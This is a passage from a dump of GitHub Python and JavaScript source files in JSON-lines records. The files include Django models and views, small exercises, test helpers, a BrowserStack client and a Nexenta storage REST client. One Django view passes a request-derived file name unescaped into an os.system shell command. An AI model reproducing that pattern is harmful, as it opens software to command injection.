ConditionalFunction from the expected JSON data.\n\n Creates a ConditionaFunction from the expected JSON data. See\n assets/templates/move_template.json for details on what the\n expected JSON data is. \n\n Note:\n A literal parameter of key/name 'cache' is automatically\n inserted and it stores the data passed into this generate\n function.\n \n Args:\n function (callable[..., T]): The primary function.\n data (dict[str, any]): The dictionary that inferred \n parameters are sourced from.\n inferred (dict[str, str]): The inferred parameters\n (inferred's dict values will be used as keys to obtain\n their new value from data and inferred's dict keys will\n remain the same) that are passed into the function.\n literal (dict[str, any]): literal parameters (those that \n do not come from data) to pass into the function.\n requirements (list[list[dict[str, any]]]): The \n requirements for the primary function to be executed.\n\n Returns:\n The generated ConditionalFunction.\n \"\"\"\n literal['cache'] = data\n \n return ConditionalFunction(\n function_node.FunctionNode(\n function, \n lambda : {key: data[value] for key, value in inferred.items()} | literal\n ), bool_evaluation_set.BoolEvaluationSet.generate(\n data,\n requirements\n )\n )","repo_name":"HaixD/Python-Turn-based-Game","sub_path":"functions/conditional_function.py","file_name":"conditional_function.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10242795379","text":"\r\n# Design python application which contains two threads named as thread1 and thread2.\r\n# Thread1 display 1 to 50 on screen and thread2 display 50 to 1 in reverse order on\r\n# screen. After execution of thread1 gets completed then schedule thread2.\r\n\r\n###############################################################################################\r\n\r\nimport threading\r\n\r\ndef Thread1(iNo,kulup):\r\n kulup.acquire()\r\n print(\"Numbers in given range : \")\r\n for i in range(1,(iNo+1)):\r\n print(i)\r\n\r\n kulup.release()\r\n\r\ndef Thread2(iNo,kulup):\r\n kulup.acquire()\r\n print(\"Numbers in given range in reverse order : \")\r\n for i in range(1,(iNo+1)):\r\n print(i)\r\n\r\n kulup.release()\r\n\r\ndef main():\r\n print(\"Enter number : \")\r\n iValue = int(input())\r\n\r\n kulup = threading.Lock()\r\n t1 = threading.Thread(target = Thread1, args = (iValue,kulup,))\r\n t2 = threading.Thread(target = Thread2, args = (iValue,kulup,))\r\n\r\n t1.start()\r\n t2.start()\r\n\r\n t1.join()\r\n t2.join()\r\n\r\n\r\nif __name__==\"__main__\":\r\n main()","repo_name":"meghamule2001/Python-Programs","sub_path":"Assignment8/Assignment8_5.py","file_name":"Assignment8_5.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70467146771","text":"from django.db import models\nfrom datetime import datetime\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n phone = models.CharField(max_length=13, blank=False)\n expiredAt = models.DateTimeField(blank=True)\n\n def __str__(self):\n return self.user.email\n\n class Meta:\n verbose_name_plural = 'Profiles'\n\n\nclass Plan(models.Model):\n name = models.CharField(max_length=128)\n price = models.CharField(max_length=128)\n period_days = models.IntegerField()\n money_count = models.IntegerField()\n\n def __str__(self):\n return f'Plan id={self.id}, plan={self.name}, price={self.price}'\n\n\nclass Order(models.Model):\n user = models.ForeignKey(User, null=True, on_delete=models.CASCADE)\n plan = models.ForeignKey(Plan, null=True, on_delete=models.SET_NULL)\n date_transaction = models.DateTimeField(auto_now_add=True)\n comment = models.TextField(blank=True)\n confirmed = models.BooleanField(default=False)\n date_start = models.DateTimeField()\n date_expired = models.DateTimeField()\n\n @property\n def get_plan_days(self):\n return int(self.plan.period_days)\n\n def __str__(self):\n return f'Order id={self.id}, plan={self.plan.name}, user={self.user.first_name}'\n\n\nclass Mark(models.Model):\n name = models.CharField(max_length=128, blank=False)\n ria_id = models.IntegerField(null=True)\n eng = models.CharField(max_length=128, blank=True)\n\n def __str__(self):\n return self.name\n\n\nclass Model(models.Model):\n name = models.CharField(max_length=128, blank=False)\n mark = models.ForeignKey(Mark, null=True, on_delete=models.CASCADE)\n ria_id = models.IntegerField(null=True)\n eng = models.CharField(max_length=128, blank=True)\n\n def __str__(self):\n return self.name\n\n\nclass Location(models.Model):\n name = models.CharField(max_length=128, blank=False)\n\n def __str__(self):\n return self.name\n\n\nclass Color(models.Model):\n name = models.CharField(max_length=64)\n\n def __str__(self):\n return self.name\n\n\nclass Gearbox(models.Model):\n name = models.CharField(max_length=64)\n\n def __str__(self):\n return self.name\n\n\nclass Body(models.Model):\n name = models.CharField(max_length=64)\n\n def __str__(self):\n return self.name\n\n\nclass Fuel(models.Model):\n name = models.CharField(max_length=64)\n\n def __str__(self):\n return self.name\n\n\nclass SellerPhone(models.Model):\n phone = models.CharField(max_length=1024, unique=True)\n\n\nclass Car(models.Model):\n model = models.ForeignKey(Model, null=True, on_delete=models.SET_NULL)\n gearbox = models.ForeignKey(Gearbox, null=True, on_delete=models.SET_NULL)\n location = models.ForeignKey(Location, null=True, on_delete=models.SET_NULL)\n fuel = models.ForeignKey(Fuel, null=True, on_delete=models.SET_NULL)\n color = models.ForeignKey(Color, null=True, on_delete=models.SET_NULL)\n year = models.IntegerField(null=True)\n mileage = models.IntegerField(null=True)\n engine = models.FloatField(null=True)\n description = models.CharField(max_length=1024, null=True)\n phone = models.ForeignKey(SellerPhone, null=True, on_delete=models.SET_NULL)\n body = models.ForeignKey(Body, null=True, on_delete=models.SET_NULL)\n image = models.CharField(max_length=256)\n dtp = models.BooleanField(default=False)\n createdAt = models.DateTimeField()\n updatedAt = models.DateTimeField(blank=True)\n last_site_updatedAt = models.DateTimeField(blank=True)\n sold = models.BooleanField(default=False)\n cleared = models.BooleanField(default=True)\n olx_link = models.URLField(blank=True)\n ria_link = models.URLField(blank=True)\n ab_link = models.URLField(blank=True)\n rst_link = models.URLField(blank=True)\n\n class Meta:\n verbose_name_plural = 'Cars'\n\n def __str__(self):\n return f' IMG_7071.JPG\r\n image_name = str(request.path).split('/')[3]\r\n # переменная для поиска поля в БД\r\n dbSearch_str = 'data/' + image_name\r\n # объект поля для HTML\r\n exist = False\r\n # проверка существования записи в БД для этого фото\r\n try:\r\n img = Image.objects.get(image=dbSearch_str)\r\n exist = True\r\n except:\r\n pass\r\n # полный путь до фото\r\n full_path = media_path + '/data/' + image_name\r\n Result = None\r\n if exist == True:\r\n if img.neuro_result == 'None':\r\n # вызов нейросети для обработки изображения\r\n os.system('python ' + neuro_path + '/classify_image.py --image_file ' + full_path)\r\n # открыть файл с выводом нейросети\r\n result_file = open(neuro_path + '/out.txt', 'r')\r\n # считать файл и разделить его по строкам (\":\" - конец строки) для HTML\r\n Result = result_file.read()\r\n # записать в БД ответ нейросети\r\n img.neuro_result = Result\r\n img.save()\r\n # закрыть файл\r\n result_file.close()\r\n else:\r\n Result = img.neuro_result\r\n # разделяй и влавствуй\r\n Result = Result.split(':')\r\n # открыть файл с помощью pillow, для масштабирования\r\n pimg = pil_img.open(full_path)\r\n # получить коефициент для масштабирования\r\n k = pimg.size[1] / 400\r\n print(k)\r\n # задать высоту и ширину изображения для HTML\r\n hgt = int(pimg.size[1] / k)\r\n wdt = int(pimg.size[0] / k)\r\n # приберём за собой с:\r\n del pimg\r\n return render(request, 'uploadImage/result.html', locals())\r\n","repo_name":"Fr1m3n/EcoStav-1","sub_path":"all/Upload/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41126771393","text":"import pytest\nfrom fastapi.testclient import TestClient\n\n\n@pytest.mark.parametrize(\n \"test_client\", [{\"ui\": {\"enabled\": True, \"path\": \"/ui\"}}], indirect=True\n)\ndef test_ui_starts_in_the_given_endpoint(test_client: TestClient) -> None:\n response = test_client.get(\"/ui\")\n assert response.status_code == 200\n","repo_name":"benito-camarillo/PrivateGPT","sub_path":"tests/ui/test_ui.py","file_name":"test_ui.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35993966395","text":"from djangojs.views import JasmineView\n\n\nclass SubstitutJasmineView(JasmineView):\n js_files = (\n 'js/libs/jquery-1.10.1.js',\n 'js/init.js',\n 'js/exceptions.js',\n 'js/recipe.js',\n 'js/responsive.js',\n 'js/storage.js',\n 'js/vote.js',\n 'js/substitut.js',\n 'js/test/*.spec.js'\n )\n","repo_name":"dessibelle/substitut.se","sub_path":"project/recipes/views/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27937125726","text":"from bsapi import Settings, Api\n\n\nclass Device:\n \"\"\"\n Represents a supported device on BrowserStack\n\n :param str os: The OS running on the device\n :param str os_version: The version number for the devices OS\n :param str device: The name of the device\n :param str real_mobile: Is the device a real phone\n \"\"\"\n def __init__(self, os=None, os_version=None, device=None, real_mobile=None):\n self.os = os\n self.os_version = os_version\n self.device = device\n self.real_mobile = real_mobile\n\n\nclass DevicesApi(Api):\n \"\"\"Class for interacting with the Devices REST endpoint on BrowserStack\"\"\"\n @classmethod\n def get_device_list(cls):\n \"\"\"\n Gets a list of devices that support Appium on BrowserStack\n\n :return: List of supported devices\n :rtype: list[:class:`bsapi.app_automate.appium.devices.Device`]\n \"\"\"\n url = f\"{Settings.base_url}/app-automate/devices.json\"\n\n response = cls.http.get(url, **Settings.request())\n\n if response.status_code == 200:\n rj = response.json()\n return [\n Device(\n os=d[\"os\"],\n os_version=d[\"os_version\"],\n device=d[\"device\"],\n real_mobile=d[\"realMobile\"]\n )\n for d\n in rj\n ]\n else:\n response.raise_for_status()\n","repo_name":"fictitiouswizard/bsapi","sub_path":"bsapi/app_automate/appium/devices.py","file_name":"devices.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25971112475","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# import numpy as np\n# import matplotlib.pyplot as plt\n\nimport math\n\n\n# def drawTriangle(a, b, c, color):\n# X = np.array([a, b, c])\n# Y = [color] * 3\n\n# plt.figure()\n# plt.scatter(X[:, 0], X[:, 1], s = 170, color = Y[:])\n\n# t1 = plt.Polygon(X[:3,:], color=Y[0])\n# plt.gca().add_patch(t1)\n\n# def drawLine(a, b):\n# x_values = [a[0], b[0]]\n# y_values = [a[1], b[1]]\n# plt.plot(x_values, y_values)\n\n# def point(coords, cor, size):\n# plt.plot(coords[0], coords[1], marker=\"o\", markersize=size, markeredgecolor=cor, markerfacecolor=\"green\")\n\ndef get_mirror_coordinates(\n size,\n pos,\n rel_cg,\n distance_count,\n ):\n [w, h] = size\n [px, py] = pos\n xr = (w - px) * 2\n xl = px * 2\n\n x = [px - rel_cg[0]] * (distance_count * 2 + 1)\n\n for i in range(distance_count + 1, distance_count * 2 + 1):\n x[i] = (x[i - 1] + xr if (i - distance_count - 1) % 2 == 0 else x[i - 1] + xl)\n\n for i in range(distance_count - 1, -1, -1):\n x[i] = (x[i + 1] - xl if (distance_count - 1 - i) % 2 == 0 else x[i + 1] - xr)\n\n dyU = (h - py) * 2\n dyD = py * 2\n y = [py - rel_cg[1]] * (distance_count * 2 + 1)\n\n for i in range(distance_count + 1, distance_count * 2 + 1):\n y[i] = (y[i - 1] + dyU if (i - distance_count - 1) % 2 == 0 else y[i - 1] + dyD)\n\n for i in range(distance_count - 1, -1, -1):\n y[i] = (y[i + 1] - dyD if (distance_count - 1 - i) % 2 == 0 else y[i + 1] - dyU)\n\n return (x, y)\n\n\ndef solution(\n dimensions,\n your_position,\n trainer_position,\n distance,\n ):\n min_d = min(dimensions)\n distance_count = distance // min_d + 1\n\n (px, py) = get_mirror_coordinates(dimensions, your_position,\n your_position, distance_count)\n (tx, ty) = get_mirror_coordinates(dimensions, trainer_position,\n your_position, distance_count)\n\n angle_dist = {}\n for _x in px:\n for _y in py:\n if _x == 0 and _y == 0:\n continue\n\n d = math.hypot(_y, _x)\n\n if d <= distance:\n beam = math.atan2(_y, _x)\n if beam in angle_dist:\n if d < angle_dist[beam]:\n angle_dist[beam] = d\n else:\n angle_dist[beam] = d\n\n res = set()\n for _x in tx:\n for _y in ty:\n d = math.hypot(_y, _x)\n if d <= distance:\n beam = math.atan2(_y, _x)\n if beam in angle_dist:\n if d < angle_dist[beam]:\n angle_dist[beam] = d\n res.add(beam)\n else:\n angle_dist[beam] = d\n res.add(beam)\n return len(res)\n\n\n# print solution([3, 2], [1, 1], [2, 1], 4)\n\n# print(solution([300,275], [150,150], [185,100], 500))\n# print(solution([2,5], [1,2], [1,4], 11))\n# print(solution([10,10], [4,4], [3,3], 5000))\n","repo_name":"edrcosta/foobar-challenge","sub_path":"test_7/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33606978682","text":"import pytest\n\n\ndef enable_version_experiment(experiments3):\n for exp_name in [\n 'combo_outer_taximeter_version',\n 'combo_taximeter_version',\n ]:\n experiments3.add_config(\n match={\n 'predicate': {'type': 'true'},\n 'enabled': True,\n 'applications': [\n {'name': 'taximeter', 'version_range': {'from': '8.0.0'}},\n {\n 'name': 'taximeter-ios',\n 'version_range': {'from': '1.0.0'},\n },\n ],\n },\n name=exp_name,\n consumers=['candidates/filters'],\n clauses=[\n {\n 'value': {'enabled': True},\n 'predicate': {'type': 'true'},\n 'enabled': True,\n },\n ],\n default_value={'enabled': False},\n )\n\n\n@pytest.mark.parametrize(\n 'zone_id, allowed_classes, combo_only_data, expected_candidates',\n [\n (\n 'moscow',\n ['econom'],\n {'order': {'calc': {'alternative_type': 'combo_inner'}}},\n [{'dbid_uuid': 'dbid0_uuid2'}],\n ),\n (\n 'moscow',\n ['econom'],\n {\n 'order': {'calc': {'alternative_type': 'combo_inner'}},\n 'combo': {'need_free': True},\n },\n [\n {'dbid_uuid': 'dbid0_uuid0'},\n {'dbid_uuid': 'dbid0_uuid1'},\n {'dbid_uuid': 'dbid0_uuid2'},\n ],\n ),\n (\n 'moscow',\n ['econom'],\n {'order': {'calc': {'alternative_type': 'combo_outer'}}},\n [\n {'dbid_uuid': 'dbid0_uuid0'},\n {'dbid_uuid': 'dbid0_uuid1'},\n {'dbid_uuid': 'dbid0_uuid2'},\n ],\n ),\n (\n 'moscow',\n ['econom'],\n {},\n [\n {'dbid_uuid': 'dbid0_uuid0'},\n {'dbid_uuid': 'dbid0_uuid1'},\n {'dbid_uuid': 'dbid0_uuid2'},\n ],\n ),\n ],\n)\n@pytest.mark.config(\n ROUTER_SELECT=[{'routers': ['linear-fallback']}],\n CANDIDATES_FILTER_COMBO_FREE_ENABLED={\n '__default__': {'__default__': True},\n },\n)\nasync def test_combo_only(\n taxi_candidates,\n driver_positions,\n combo_contractors,\n zone_id,\n allowed_classes,\n combo_only_data,\n expected_candidates,\n experiments3,\n):\n enable_version_experiment(experiments3)\n\n await driver_positions(\n [\n {'dbid_uuid': 'dbid0_uuid0', 'position': [37.63, 55.74]},\n {'dbid_uuid': 'dbid0_uuid1', 'position': [37.63, 55.74]},\n {'dbid_uuid': 'dbid0_uuid2', 'position': [37.63, 55.74]},\n ],\n )\n\n combo_contractors([{'dbid_uuid': 'dbid0_uuid2'}])\n\n request_body = {\n 'limit': 10,\n 'zone_id': zone_id,\n 'allowed_classes': allowed_classes,\n 'point': [37.63, 55.74],\n 'destination': [37.64, 55.73],\n }\n\n request_body.update(combo_only_data)\n\n response = await taxi_candidates.post('order-search', json=request_body)\n\n assert response.status_code == 200\n\n candidates = [\n {'dbid_uuid': candidate['id']}\n for candidate in response.json()['candidates']\n ]\n\n assert (\n sorted(candidates, key=lambda x: x['dbid_uuid']) == expected_candidates\n )\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_candidates/test_filter_combo_only.py","file_name":"test_filter_combo_only.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25215666255","text":"import sys\nimport os\nimport imageio\nfrom natsort import natsorted\n\n# Program makes an animation out of the frames stored in /frames\n\ndef readFrames(reverse):\n directory = sys.path[0] + '/frames'\n\n frames = os.listdir(directory)\n frames = natsorted(frames)\n\n frameNum = len(frames)-1\n if reverse:\n frameNum *= 2\n\n images = []\n counter = 1\n print('Reading frames started.')\n for frame in frames:\n if frame != '.gitignore':\n file = directory + f'/{frame}'\n images.append(imageio.imread(file))\n print(f'Frame {counter} done, {round(100*counter/frameNum, 2)}%.')\n counter += 1\n\n if reverse:\n frames = natsorted(frames, reverse=True)\n for frame in frames:\n if frame != '.gitignore':\n file = directory + f'/{frame}'\n images.append(imageio.imread(file))\n print(f'Frame {counter} done, {round(100*counter/frameNum, 2)}%.')\n counter += 1\n\n print('Reading frames complete.')\n return images\n\ndef createAnimation(fileName, reverse=False):\n filePath = sys.path[0]+f'/animations/{fileName}.gif'\n\n images = readFrames(reverse)\n\n print('Rendering.')\n imageio.mimsave(filePath, images, fps=24)\n print('Done.')\n\ndef clearFrames():\n directory = sys.path[0] + '/frames'\n frames = os.listdir(directory)\n for frame in frames:\n if frame != '.gitignore':\n file = directory + f'/{frame}'\n os.remove(file)","repo_name":"esakalys/power-animations","sub_path":"functions/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38291202183","text":"from sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\n\nMODEL = [\n RandomForestClassifier(),\n LogisticRegression(),\n SVC(),\n DecisionTreeClassifier(),\n]\nMODEL_TITLE = [\n \"Random Forest Classifier\",\n \"Logistic Regression\",\n \"Support Vector Classifier\",\n \"Decision Tree Classifier\",\n]\nDATASET_PATH = \"dataset/online_shoppers_intention.csv\"\nOBJECT_COLUMNS = [\"VisitorType\", \"Month\", \"Revenue\"]\nX_OBJECT_COLUMNS = [\"VisitorType\", \"Month\"]\nY_COLUMN = \"Revenue\"\nX_CATEGORICAL_COLUMNS = [\n \"Administrative\",\n \"Informational\",\n \"ProductRelated\",\n \"Month\",\n \"OperatingSystems\",\n \"Browser\",\n \"Region\",\n \"TrafficType\",\n \"VisitorType\",\n \"Weekend\",\n]\nX_CONTINUES_COLUMNS = [\n \"Administrative_Duration\",\n \"Informational_Duration\",\n \"ProductRelated_Duration\",\n \"BounceRates\",\n \"ExitRates\",\n \"PageValues\",\n \"SpecialDay\",\n]\nCATEGORICAL_COLUMNS = [\n \"Administrative\",\n \"Informational\",\n \"ProductRelated\",\n \"Month\",\n \"OperatingSystems\",\n \"Browser\",\n \"Region\",\n \"TrafficType\",\n \"VisitorType\",\n \"Weekend\",\n \"Revenue\",\n]\nCONTINUES_COLUMNS = [\n \"Administrative_Duration\",\n \"Informational_Duration\",\n \"ProductRelated_Duration\",\n \"BounceRates\",\n \"ExitRates\",\n \"PageValues\",\n \"SpecialDay\",\n \"Revenue\",\n]\n","repo_name":"SynitCool/Online-Shoppers","sub_path":"model_testing/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9123284557","text":"import numpy as np\nfrom nltk.corpus import stopwords\nfrom sklearn.naive_bayes import GaussianNB\nfrom nltk.tokenize import RegexpTokenizer\nwith open('angry.txt', 'r') as f:\n angry = f.read()\nwith open('happy.txt', 'r') as f:\n happy = f.read()\nwith open('sad.txt', 'r') as f:\n sad = f.read()\nwith open('kind.txt', 'r') as f:\n kind = f.read()\nwith open('nervous.txt', 'r') as f:\n nervous = f.read()\nwith open('shy.txt', 'r') as f:\n shy = f.read()\nwith open('test.txt', 'r') as f:\n test = f.read()\nsw=set(stopwords.words(\"english\"))\ndef remove_stopwords(words):\n wor=[w for w in words if w not in sw]\n return(wor)\ndef tokenizer_(text):\n text=text.lower()\n token=RegexpTokenizer(\"[a-zA-Z]+\")\n word=token.tokenize(text)\n word_list=remove_stopwords(word)\n #gimme=ngrams(word_list,2)\n #ps=PorterStemmer()\n #tokenized=[]\n #tokenized=[ps.stem(w) for w in word_list if ps.stem(w) not in tokenized ]\n #cv = CountVectorizer(tokenizer=tokenizer_, ngram_range=(1, 2))\n #vector = cv.fit_transform(tokenized).todense()\n #vc=vectorised_\n #length = sum(1 for el in gimme())\n #my_array = np.empty(length)\n #for i, el in enumerate(gimme()): my_array[i] = el\n return (word_list)\nangry=tokenizer_(angry)\nsad=tokenizer_(sad)\nnervous=tokenizer_(nervous)\nhappy=tokenizer_(happy)\nkind=tokenizer_(kind)\nshy=tokenizer_(shy)\nc1=len(angry)\nc2=len(angry)+len(sad)\nc3=len(angry)+len(sad)+len(happy)\nc4=len(shy)+len(angry)+len(sad)+len(happy)\nc5=len(angry)+len(sad)+len(happy)+len(shy)+len(kind)\nc6=len(angry)+len(sad)+len(happy)+len(shy)+len(nervous)+len(kind)\none=np.ones(c6)#1-Angry\none[:c2]*=2#sad\none[c2:c3]*=3#happy\none[c3:c4]*=4#shy\none[c4:c5]*=5#kind\none[c5:]*=6#nervous\nvocab_to_int = {i: w for i,w in enumerate(angry+sad+happy+shy+kind+nervous, 1)}\ndef text_tokenize(text):\n test=tokenizer_(text)\n int=[key for key,word in vocab_to_int.items() if word in test]\n int=np.array(int)\n return int\nX_train=np.array(list(vocab_to_int.keys()))\nX_train=X_train.reshape(-1,1)\nY_train=one\nX_test=text_tokenize(test).reshape(-1,1)\ndef softmax(x):\n e_x = np.exp(x - np.max(x))\n return e_x / e_x.sum()\ndef prediction(X_train,Y_train,X_test):\n nb=GaussianNB()\n nb.fit(X_train,Y_train)\n Y_pred=nb.predict(X_test)\n Pred=np.unique(Y_pred,return_counts=True)\n Class_=np.argmax(Pred[0])+1\n return Class_\ndef print_RES(r):\n if r==1:\n print(\"Angry : Negative\")\n elif r==2:\n print(\"Sad : Negative\")\n elif r==3:\n print(\"Happy : Positive\")\n elif r==4:\n print(\"Shy : Neutral\")\n elif r==5:\n print(\"Kind : Positive\")\n else:\n print(\"Nervous: Negative\")\nRESULT=prediction(X_train,Y_train,X_test)\nprint_RES(RESULT)","repo_name":"divyakshib/Sentiment-Analysis","sub_path":"Sentiment_Classifier.py","file_name":"Sentiment_Classifier.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9680964745","text":"import json\nimport base64\n\nimport core.exceptions as ex\nfrom foreign.six.moves.urllib.request import Request, urlopen # pylint: disable=import-error\nfrom foreign.six.moves.urllib.error import URLError # pylint: disable=import-error\nfrom utilities.naming import factory, split_path\nfrom utilities.string import base64encode\nfrom core.node import Node\n\nclass logger(object):\n def __init__(self):\n pass\n\n def info(self, msg):\n print(msg)\n\n def warning(self, msg):\n print(msg)\n\n def error(self, msg):\n print(msg)\n\nclass Nexenta(object):\n def __init__(self, head, log=None, node=None):\n self.object_type_cache = {}\n self.head = head\n self.auto_prefix = \"svc:/system/filesystem/zfs/auto-sync:\"\n self.username = None\n self.password = None\n self.port = 2000\n if node:\n self.node = node\n else:\n self.node = Node()\n if log is not None:\n self.log = log\n else:\n self.log = self.node.log\n\n def init(self):\n if self.username is not None and self.password is not None:\n return\n s = \"array#\" + self.head\n try:\n stype = self.node.oget(s, \"type\")\n except Exception:\n raise ex.Error(\"no array configuration for head %s\"%self.head)\n if stype != \"nexenta\":\n raise ex.Error(\"array %s type is not nexanta\" % self.head)\n try:\n self.username = self.node.oget(s, \"username\")\n except Exception:\n raise ex.Error(\"no username information for head %s\"%self.head)\n try:\n self.password = self.node.oget(s, \"password\")\n except Exception:\n raise ex.Error(\"no password information for head %s\"%self.head)\n self.port = self.node.oget(s, \"port\")\n try:\n secname, namespace, _ = split_path(self.password)\n self.password = factory(\"sec\")(secname, namespace=namespace, volatile=True).decode_key(\"password\")\n except Exception as exc:\n raise ex.Error(\"error decoding password: %s\" % exc)\n self.url = 'https://%(head)s:%(port)d/rest/nms/ '%dict(head=self.head, port=self.port)\n\n def rest(self, obj, method, params):\n self.init()\n data = {\"method\": method, \"params\": params, \"object\": obj}\n data = json.dumps(data)\n request = Request(self.url, data)\n base64string = base64encode('%s:%s' % (self.username, self.password))[:-1]\n request.add_header('Authorization', 'Basic %s' % base64string)\n request.add_header('Content-Type' , 'application/json')\n try:\n response = urlopen(request)\n except URLError:\n raise ex.Error(\"unreachable head %s\"%self.head)\n response = json.loads(response.read())\n return response\n\n def dbus_auth_keys_list(self):\n data = self.rest(\"appliance\", \"dbus_auth_keys_list\", [])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def ssh_list_bindings(self):\n data = self.rest(\"appliance\", \"ssh_list_bindings\", [])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def ssh_unbind(self, user, hostport, force=\"0\"):\n data = self.rest(\"appliance\", \"ssh_unbind\", [user, hostport, force])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def ssh_bind(self, user, hostport, password):\n data = self.rest(\"appliance\", \"ssh_bind\", [user, hostport, password])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def autosync_get_names(self):\n data = self.rest(\"autosync\", \"get_names\", [''])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def autosync_disable(self, name):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"autosync\", \"disable\", [name])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def autosync_enable(self, name):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"autosync\", \"enable\", [name])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def autosync_execute(self, name):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"autosync\", \"execute\", [name])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def autosync_get_state(self, name):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"autosync\", \"get_state\", [name])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def autosync_set_prop(self, name, prop, value):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"autosync\", \"set_child_prop\", [name, prop, value])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n return data['result']\n\n def autosync_get_props(self, name):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"autosync\", \"get_child_props\", [name, ''])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n return data['result']\n\n def autosync_register(self, name):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"runner\", \"register\", [name, {}, {}])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n return data['result']\n\n def zvol_clone(self, src, dst):\n data = self.rest(\"zvol\", \"clone\", [src, dst])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n\n def folder_clone(self, src, dst):\n data = self.rest(\"folder\", \"clone\", [src, dst])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n\n def clone(self, src, dst):\n snap = \"@\".join([src, dst.replace('/','_')])\n object_type = self.object_type(src)\n if object_type == \"folder\":\n self.folder_clone(snap, dst)\n elif object_type == \"zvol\":\n self.zvol_clone(snap, dst)\n else:\n raise ex.Error(\"object type %s is not cloneable\"%str(object_type))\n\n def snapshot_create(self, src, dst, recursive=0):\n dst = dst.replace('/','_')\n object_type = self.object_type(src)\n if object_type == \"folder\":\n self.folder_snapshot(src, dst, recursive)\n elif object_type == \"zvol\":\n self.zvol_snapshot(src, dst, recursive)\n else:\n raise ex.Error(\"object type %s is not snapable\"%str(object_type))\n\n def zvol_snapshot(self, src, dst, recursive=0):\n data = self.rest(\"zvol\", \"create_snapshot\", [src, dst, recursive])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n\n def folder_snapshot(self, src, dst, recursive=0):\n snap = \"@\".join([src, dst])\n data = self.rest(\"snapshot\", \"create\", [snap, recursive])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n\n def snapshot_destroy(self, src, dst, recursive=''):\n snap = \"@\".join([src, dst])\n data = self.rest(\"snapshot\", \"destroy\", [snap, recursive])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n\n def snapshot_get_names(self):\n data = self.rest(\"snapshot\", \"get_names\", [''])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n return data['result']\n\n def folder_get_names(self):\n data = self.rest(\"folder\", \"get_names\", [''])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n for folder in data['result']:\n self.object_type_cache[folder] = \"folder\"\n return data['result']\n\n def zvol_get_names(self):\n data = self.rest(\"zvol\", \"get_names\", [''])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n for zvol in data['result']:\n self.object_type_cache[zvol] = \"zvol\"\n return data['result']\n\n def object_type(self, o):\n if o in self.object_type_cache:\n return self.object_type_cache[o]\n if o in self.folder_get_names():\n self.object_type_cache[o] = \"folder\"\n return \"folder\"\n elif o in self.zvol_get_names():\n self.object_type_cache[o] = \"zvol\"\n return \"zvol\"\n else:\n raise ex.Error(\"can not determine type of object %s\"%o)\n\n def set_prop(self, name, prop, val):\n otype = self.object_type(name)\n return self._set_prop(otype, name, prop, val)\n\n def _set_prop(self, otype, name, prop, val):\n data = self.rest(otype, 